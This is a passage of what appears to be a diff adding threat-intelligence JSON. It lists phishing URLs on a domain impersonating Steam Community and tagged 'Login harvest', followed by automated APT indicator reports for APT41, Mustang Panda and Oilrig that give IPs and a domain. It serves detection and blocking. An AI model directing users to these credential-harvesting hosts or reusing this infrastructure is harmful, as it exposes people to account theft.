"Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:38066505b5660dfdd3e21d7b7ef7bb4e9290229f10b5a9368c3dbe8d8fbbb466", + "filetype": "pageHtml", + "filename": "h:38066505b5660dfdd3e21d7b7ef7bb4e9290229f10b5a9368c3dbe8d8fbbb466", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:cf6a9b87835706a3b7e66ba70ab38392a9b8718717bfcdf370bbc7436fa19a55", + "filetype": "pageScreen", + "filename": "s:cf6a9b87835706a3b7e66ba70ab38392a9b8718717bfcdf370bbc7436fa19a55", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "afcd42feb05c0b9b4e725e4266bd1e9ca092627706f954750f7ec38b168e7820", + "url": "http://accsteamorigin.sells.com.ua/command-conquer-red-alert-3/p27", + "date": { + "blocked": "2017-11-07T05:06:19+03:00", + "added": "2017-10-11T22:45:22+03:00", + "detected": "2017-10-11T22:45:22+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:f4235c27d5d1aa5952035dd51b4299e5c81fd0bf377d915f12f8e2902458328c", + "filetype": "pageHtml", + "filename": 
"h:f4235c27d5d1aa5952035dd51b4299e5c81fd0bf377d915f12f8e2902458328c", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:a335c8435e7773ad5d805df814a79cccb31bcf414d1df7527697038db5960c74", + "filetype": "pageScreen", + "filename": "s:a335c8435e7773ad5d805df814a79cccb31bcf414d1df7527697038db5960c74", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "32268ec99874164fb09655e899adcc44964a9b88844919fc9b6fc0930d188344", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2?sort=expensive&size=10", + "date": { + "blocked": "2017-12-07T07:23:52+03:00", + "added": "2017-10-11T22:14:20+03:00", + "detected": "2017-10-11T22:14:20+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:6413fb9f0b0a2869a40fe6e970d6fc638cc0cc9fe4c664f5d1c99f56fa3c36b7", + "filetype": "pageHtml", + "filename": "h:6413fb9f0b0a2869a40fe6e970d6fc638cc0cc9fe4c664f5d1c99f56fa3c36b7", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "399987ec3383d660e5833b7396a817884fbe2eb8a14eae715bfeb8bcce329978", + "url": 
"http://accsteamorigin.sells.com.ua/akkauntyi-steam/c1?size=10&sort=name", + "date": { + "blocked": "2017-12-07T07:23:52+03:00", + "added": "2017-10-11T22:14:24+03:00", + "detected": "2017-10-11T22:14:24+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:d2bae3ff95a90fcc43485921a13e156c3f7e3c5d119fb79b786d69a27be47278", + "filetype": "pageHtml", + "filename": "h:d2bae3ff95a90fcc43485921a13e156c3f7e3c5d119fb79b786d69a27be47278", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "d3b85abb6f339983ae8378ac1d3d7b2bd28d9e07c6e6de7d42a34f46c99c2ad6", + "url": "http://accsteamorigin.sells.com.ua/empire-total-war/p2", + "date": { + "blocked": "2017-12-07T07:23:51+03:00", + "added": "2017-10-11T22:09:09+03:00", + "detected": "2017-10-11T22:09:09+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": 
"UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:35e7a745885e371b61eb3a8248c467f3dd934fc398d1739f18966b0e4d35af0e", + "filetype": "pageHtml", + "filename": "h:35e7a745885e371b61eb3a8248c467f3dd934fc398d1739f18966b0e4d35af0e", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:543c98d243bbc39461aecc4d5cde25a7cf5b798e6b4d79bcc4ce68316bd9abbb", + "filetype": "pageScreen", + "filename": "s:543c98d243bbc39461aecc4d5cde25a7cf5b798e6b4d79bcc4ce68316bd9abbb", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "d21964c861da14ca52dc598458157e8ef38d2d75110e0244396290e0fd0c8bc3", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2?size=10&=amp", + "date": { + "blocked": "2017-12-07T07:23:51+03:00", + "added": "2017-10-11T22:03:13+03:00", + "detected": "2017-10-11T22:03:13+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:4d0fec164c571176d65b752a5f7412ee11f04400a0e0e34da337e2f080ae8ac9", + "filetype": "pageHtml", + "filename": "h:4d0fec164c571176d65b752a5f7412ee11f04400a0e0e34da337e2f080ae8ac9", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e1a659acc300693c1eefedd540c76109c2f2b4bdd53999f9cc188463683ba597", + "filetype": "pageScreen", + "filename": 
"s:e1a659acc300693c1eefedd540c76109c2f2b4bdd53999f9cc188463683ba597", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "71fa641ca0260cf5097cdc94363af3cca077903d73ef51dbf84d2fe966da00e1", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2/2", + "date": { + "blocked": "2017-12-07T07:23:49+03:00", + "added": "2017-10-11T21:46:48+03:00", + "detected": "2017-10-11T21:46:48+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageHtml", + "filename": "h:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:f84da9cc91c3708ce72861e19bbf854af534d2cf77ca0586432c0c123ddb0514", + "filetype": "pageScreen", + "filename": "s:f84da9cc91c3708ce72861e19bbf854af534d2cf77ca0586432c0c123ddb0514", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "52ebffd121be60515ce9403b425c11b7724b86c1259be50196e2b81c8cb70534", + "url": "http://accsteamorigin.sells.com.ua/products?sort=expensive&size=10", + "date": { + "blocked": "2017-12-07T07:23:47+03:00", + "added": "2017-10-11T21:42:11+03:00", + "detected": "2017-10-11T21:42:11+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + 
"domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:f9b7a6cc1617e663eabde3527869f723ca4c496c9a8b8b40c4090d3be6877012", + "filetype": "pageHtml", + "filename": "h:f9b7a6cc1617e663eabde3527869f723ca4c496c9a8b8b40c4090d3be6877012", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "546c7738cd52d6882b34f1a93adb1ff9864ef59ca255be91e0afc815bd3927c8", + "url": "http://accsteamorigin.sells.com.ua/products/2?sort=name", + "date": { + "blocked": "2017-12-07T07:23:47+03:00", + "added": "2017-10-11T21:42:10+03:00", + "detected": "2017-10-11T21:42:10+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageHtml", + "filename": 
"h:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:2a6262c9e361abb7bd31ff64d6070ad423eb62bdd5771dfad8827248ec6fb8c5", + "filetype": "pageScreen", + "filename": "s:2a6262c9e361abb7bd31ff64d6070ad423eb62bdd5771dfad8827248ec6fb8c5", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "6551900a64bcb77261de7b9c885aa26effe30064872c17de2a1fc1d435573ee1", + "url": "http://accsteamorigin.sells.com.ua/products?sort=name&size=30", + "date": { + "blocked": "2017-12-07T07:23:46+03:00", + "added": "2017-10-11T21:30:55+03:00", + "detected": "2017-10-11T21:30:55+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:8e741caac344e2763637e42d22cffb812bd28d42e1d53ab1f714f27504eaa27e", + "filetype": "pageHtml", + "filename": "h:8e741caac344e2763637e42d22cffb812bd28d42e1d53ab1f714f27504eaa27e", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:f9ff8e76dad9ec24da6ad9e133e73c7b111abeeb5e807cb15f8cb4ea2f83c836", + "filetype": "pageScreen", + "filename": "s:f9ff8e76dad9ec24da6ad9e133e73c7b111abeeb5e807cb15f8cb4ea2f83c836", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "ef1a653812575dde248b8de44a80d999e4b498aac53d56ab7af1cf6f1d7edb6b", + "url": "http://accsteamorigin.sells.com.ua/products?sort=name&size=10", + "date": { + 
"blocked": "2017-12-07T07:23:46+03:00", + "added": "2017-10-11T21:30:53+03:00", + "detected": "2017-10-11T21:30:53+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:76f3775c680f1aae22fe62abdc5c330a1a49ea36ca104a9063a76a0a41ee7063", + "filetype": "pageHtml", + "filename": "h:76f3775c680f1aae22fe62abdc5c330a1a49ea36ca104a9063a76a0a41ee7063", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:5973a2971f6ec1e730d69e7be8b7246b355dcf5dbebfac1b44d4c79fc89f4b9b", + "filetype": "pageScreen", + "filename": "s:5973a2971f6ec1e730d69e7be8b7246b355dcf5dbebfac1b44d4c79fc89f4b9b", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "12c1361579bffe67dd10524c20390a8e749072fbb838c25d9ac918d074a096ca", + "url": "http://accsteamorigin.sells.com.ua/klyuchi-steam/c6?sort=name", + "date": { + "blocked": "2017-12-07T07:23:42+03:00", + "added": "2017-10-11T21:23:28+03:00", + "detected": "2017-10-11T21:23:28+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": 
"91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:6c3cb8483e025939fe5862dc3f757b486172445c5aaeef53822dbc4ad0c4cdf1", + "filetype": "pageHtml", + "filename": "h:6c3cb8483e025939fe5862dc3f757b486172445c5aaeef53822dbc4ad0c4cdf1", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:398180d20fc9854acaad4f78ed9f3e851d0fce936ff41cf6ea461e1711e19998", + "filetype": "pageScreen", + "filename": "s:398180d20fc9854acaad4f78ed9f3e851d0fce936ff41cf6ea461e1711e19998", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "c3078d9cb7c580110c854c8a4c041655d012278626680a02b0bb985ab952ba0f", + "url": "http://accsteamorigin.sells.com.ua/products?size=10&page=1", + "date": { + "blocked": "2017-12-07T07:23:42+03:00", + "added": "2017-10-11T21:23:28+03:00", + "detected": "2017-10-11T21:23:28+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:a28117d088b88babeb5ce148e1f73ce21a93b9d35361b6ac640b6c5633703272", + "filetype": "pageHtml", + "filename": "h:a28117d088b88babeb5ce148e1f73ce21a93b9d35361b6ac640b6c5633703272", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": 
"" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "fcd6b9e192152cd4103b465cdfe7a539f5a0c76b5764b458aa68b1c0002b7e45", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2/2?sort=cheap", + "date": { + "blocked": "2017-12-07T07:23:41+03:00", + "added": "2017-10-11T21:11:27+03:00", + "detected": "2017-10-11T21:11:27+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:8e9d461ed5cf4f874cead72e4d7f901afc3d1527dd6b3b00557803e250e69cce", + "filetype": "pageHtml", + "filename": "h:8e9d461ed5cf4f874cead72e4d7f901afc3d1527dd6b3b00557803e250e69cce", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:7e820107f712a853286fbfa04052d9f8649b32da6f6f9b6f8870ddc7173d61d1", + "filetype": "pageScreen", + "filename": "s:7e820107f712a853286fbfa04052d9f8649b32da6f6f9b6f8870ddc7173d61d1", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "38f94514e569b81b0fe264da5d48c93677332a017d217ac35bb59e369c7f34ab", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-steam/c1?size=10&sort=cheap", + "date": { + "blocked": "2017-12-07T07:23:40+03:00", + "added": "2017-10-11T20:53:30+03:00", + "detected": "2017-10-11T20:53:30+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + 
"title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:e77a6f04ea5e6b2e7aab924a36739cfc01ff514939bd44dc49c08a87a97b8477", + "filetype": "pageHtml", + "filename": "h:e77a6f04ea5e6b2e7aab924a36739cfc01ff514939bd44dc49c08a87a97b8477", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "bbee01e256e188625648aa5fe8c9db2d7b7298b6d03b229e24e1018617d45c0e", + "url": "http://accsteamorigin.sells.com.ua/products?sort=cheap&size=30", + "date": { + "blocked": "2017-12-07T07:23:40+03:00", + "added": "2017-10-11T20:36:03+03:00", + "detected": "2017-10-11T20:36:03+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:cfaea13d115982fe593364e5d2a4e47436681010e094eb752a78e92a469ee252", + "filetype": "pageHtml", + "filename": "h:cfaea13d115982fe593364e5d2a4e47436681010e094eb752a78e92a469ee252", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + 
"hashSha256": "s:536691c2f90954d9af264ebb947e5fde4425d91a34157d34518f4f2449e709b1", + "filetype": "pageScreen", + "filename": "s:536691c2f90954d9af264ebb947e5fde4425d91a34157d34518f4f2449e709b1", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + } + ], + "displayOptions": { + "isFavourite": false, + "isHidden": false + } + } + ], + "seqUpdate": 1430425612098642 + }, + "apt/threat":{ + "count": 57, + "items": [ + { + "contacts": [], + "countries": [], + "createdAt": "2024-09-23T23:20:09+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-23", + "dateLastSeen": "2024-09-23", + "datePublished": "2024-09-24", + "description": "\n
\n    This report is published automatically.\n

\n During daily monitoring of malicious infrastructure the Group-IB Threat Intelligence detected the following indicators:\n

\n\n
  • hosts (1)

\n The disclosed indicators with medium/medium-high confidence belong to the\n APT41. The indicators have already been used or will be used in future attacks.\n

\n\n

\n Source description:\n

\n
  • \n Group-IB hunting rules – information received as a result of detecting by hunting rule.\n

Detected network indicators:

\n\n \n \n \n \n \n \n \n \n \n \n \n \n
SourceURLDomainIPRelated malware

Group-IB hunting rules

--

95[.]179[.]134[.]240

-
", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "red", + "tlp": "red", + "ttl": null + }, + "expertise": [ + "AutoReport" + ], + "files": [], + "forumsAccounts": [], + "hasIocs": true, + "id": "d1da0a53543a18e5240ece12d031b6ad711a8202", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [ + { + "attributes": null, + "dateFirstSeen": "2024-09-23", + "dateLastSeen": "2024-09-23", + "description": null, + "id": "6ecb34d68b26c7bc369dd209f0db9cc3a9c6a8c7", + "langs": [ + "ru" + ], + "malwareIdList": null, + "malwareList": [], + "params": { + "domain": null, + "ipv4": [ + "95.179.134.240" + ], + "ipv6": [], + "ssl": [], + "url": "" + }, + "seqUpdate": 17271228138607, + "sources": [ + "panda_playbook" + ], + "techSeqUpdate": null, + "title": null, + "type": "network" + } + ], + "indicatorsIds": [ + "6ecb34d68b26c7bc369dd209f0db9cc3a9c6a8c7" + ], + "isAutogen": true, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-2320", + "sectors": [], + "seqUpdate": 17271360303706, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": "CN", + "id": "59a1326f2bed234dcb864a69e7ab28b2fa4b14e9", + "isAPT": true, + "name": "APT41" + }, + "title": "APT41 - New indicators have been found", + "toolList": [], + "type": "event", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-24T03:00:30+03:00" + }, + { + "contacts": [], + "countries": [], + "createdAt": "2024-09-24T03:50:06+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-24", + 
"dateLastSeen": "2024-09-24", + "datePublished": "2024-09-25", + "description": "\n
\n    This report is published automatically.\n

\n During daily monitoring of malicious infrastructure the Group-IB Threat Intelligence detected the following indicators:\n

\n\n
  • hosts (1)

\n The disclosed indicators with medium/medium-high confidence belong to the\n Mustang Panda. The indicators have already been used or will be used in future attacks.\n

\n\n

\n Source description:\n

\n
  • \n Group-IB hunting rules – information received as a result of detecting by hunting rule.\n

Detected network indicators:

\n\n \n \n \n \n \n \n \n \n \n \n \n \n
SourceURLDomainIPRelated malware

Group-IB hunting rules

--

147[.]78[.]12[.]202

-
", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "red", + "tlp": "red", + "ttl": null + }, + "expertise": [ + "AutoReport" + ], + "files": [], + "forumsAccounts": [], + "hasIocs": true, + "id": "d2fbd8a75768de39f022b3173babc0e7ec64a521", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [ + { + "attributes": null, + "dateFirstSeen": "2024-09-24", + "dateLastSeen": "2024-09-24", + "description": null, + "id": "375efaa5e042b289579c147dd1c95d9b8ccdbee4", + "langs": [ + "ru" + ], + "malwareIdList": null, + "malwareList": [], + "params": { + "domain": null, + "ipv4": [ + "147.78.12.202" + ], + "ipv6": [], + "ssl": [], + "url": "" + }, + "seqUpdate": 17271390119447, + "sources": [ + "panda_playbook" + ], + "techSeqUpdate": null, + "title": null, + "type": "network" + } + ], + "indicatorsIds": [ + "375efaa5e042b289579c147dd1c95d9b8ccdbee4" + ], + "isAutogen": true, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-0350", + "sectors": [], + "seqUpdate": 17272224218059, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": "CN", + "id": "06aea4ef831ae0fe5c97348e47901fc7293ebd40", + "isAPT": true, + "name": "Mustang Panda" + }, + "title": "Mustang Panda - New indicators have been found", + "toolList": [], + "type": "event", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-25T03:00:21+03:00" + }, + { + "contacts": [], + "countries": [], + "createdAt": "2024-09-24T08:50:11+03:00", + "cveList": [], + "dateFirstSeen": 
"2024-09-24", + "dateLastSeen": "2024-09-24", + "datePublished": "2024-09-25", + "description": "\n
\n    This report is published automatically.\n

\n During daily monitoring of malicious infrastructure the Group-IB Threat Intelligence detected the following indicators:\n

\n\n
  • hosts (1)

\n The disclosed indicators with medium/medium-high confidence belong to the\n Oilrig. The indicators have already been used or will be used in future attacks.\n

\n\n

\n Source description:\n

\n
  • \n Group-IB hunting rules – information received as a result of detecting by hunting rule.\n

Detected network indicators:

\n\n \n \n \n \n \n \n \n \n \n \n \n \n
SourceURLDomainIPRelated malware

Group-IB hunting rules

-wehermes[.]com--
